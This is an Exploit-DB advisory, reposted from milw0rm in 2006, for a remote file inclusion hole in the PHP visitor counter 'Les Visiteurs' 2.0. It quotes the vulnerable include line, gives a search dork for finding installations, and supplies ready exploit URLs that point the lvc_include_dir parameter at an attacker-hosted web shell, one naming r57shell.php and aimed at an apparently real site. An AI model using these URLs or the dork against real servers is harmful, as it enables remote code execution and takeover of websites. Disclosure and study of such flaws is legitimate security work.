Les Visiteurs Visitors <= 2.0 - config.inc.php File Include Vulnerability

2006-09-28T00:00:00
ID EDB-ID:2449
Type exploitdb
Reporter D_7J
Modified 2006-09-28T00:00:00

Description

Les Visiteurs (Visitors) <= 2.0 (config.inc.php) File Include Vulnerability. Webapps exploit for php platform

                                        
                                            #==============================================================================================
#lesvisit (visiteurs) &lt;= v2.0 (lvc_include_dir) Remote File Include Vulnerability
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Download from : http://www.comscripts.com/jump.php?action=script&id=41
#                                                                      
#Version : 2.0                                            
#                                                        
#================================================================================================
#
#Dork : "visiteurs v2.0"
#
#================================================================================================
#Bug in : /include/config.inc.php
#
#Vlu Code :
#--------------------------------
#
# 	include($lvc_include_dir.'lang/english.inc.php');
#
#	http://www.ensg.ign.fr/~daniel/ganesha/visiteurs20/include/config.inc.php?lvc_include_dir=http://d4wood.by.ru/r57shell.php?
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/include/config.inc.php?lvc_include_dir=http://sheller.com?
#
#================================================================================================
#Discoverd By : D_7J
#
#Site:http://Deltahacking.ir (public) http://deltahacking.net (priv8)
#
#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net
#
#Special Thx To : Str0ke
#
#Greetz: All Iranian Hackers
#
==================================================================================================

# milw0rm.com [2006-09-28]